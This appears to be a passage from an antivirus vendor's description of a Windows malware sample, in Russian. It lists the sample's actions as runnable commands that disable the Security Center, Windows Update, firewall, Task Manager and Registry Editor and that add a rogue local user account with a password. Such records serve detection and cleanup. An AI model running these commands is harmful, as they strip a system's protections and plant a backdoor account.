Техническая информация
- скрытых файлов
- Диспетчера задач (Taskmgr)
- Редактора реестра (RegEdit)
- '<SYSTEM32>\REG.exe' add HKLM\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 00000004 /f
- '<SYSTEM32>\net1.exe' user p0rn ViRs0nU /add
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s p0rn /add
- '<SYSTEM32>\REG.exe' add HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /v Start /t REG_DWORD /d 00000004 /f
- '<SYSTEM32>\REG.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '<SYSTEM32>\REG.exe' add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
- '<SYSTEM32>\REG.exe' add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess /v Start /t REG_DWORD /d 00000004 /f
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoThemesTab' = '00000000'
- ClassName: 'Button' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''